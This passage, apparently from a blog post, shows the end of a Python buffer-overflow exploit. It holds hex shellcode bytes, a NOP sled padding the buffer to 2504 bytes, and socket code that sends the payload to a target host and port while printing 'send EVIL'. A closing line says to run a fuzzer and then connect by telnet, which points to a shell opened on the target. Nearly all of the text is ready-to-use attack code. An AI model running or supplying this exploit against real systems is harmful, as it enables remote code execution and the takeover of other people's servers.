"\x3d\x1f\x94\xad\x14\xb5\xe5\x81\xff\x5c\x7e\x47\x68\xc2\x13\x0e"
"\x8d\x6e\xbc\x49\x67\xa3\xb5\x8e\x1d\x7f\x4f\xb2\xd3\xbf\xbc\x98"
"\xea\x02\x6e\x22\x50\xaf\xe3\x57\x2f\x97\xa8\xcc\x7b\x8f\xdc\xec"
"\xcf\x46\xde\x65\x74\x98\xf6\xde\x23\x34\xa6\xb1\x9a\xd2\x49\x60"
"\x4c\x76\x1b\x7d\xbe\x10\x36\x58\x3a\x2f\x1b\xa5\x93\xc5\x63\xa6"
"\x2b\xe5\x4c\xd3\x03\xe5\xee\x27\xcf\xea\x27\xf5\xef\xc5\xa0\x87"
"\xd7\x04\x43\x24\x17\x1e\x5b\x1a"
)
buffer+="\x90" * (2504 - len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("send EVIL")
sock.close()
print("finish")
then run big ant and run fuzzer, then open connection using telnet
No comments:
Post a Comment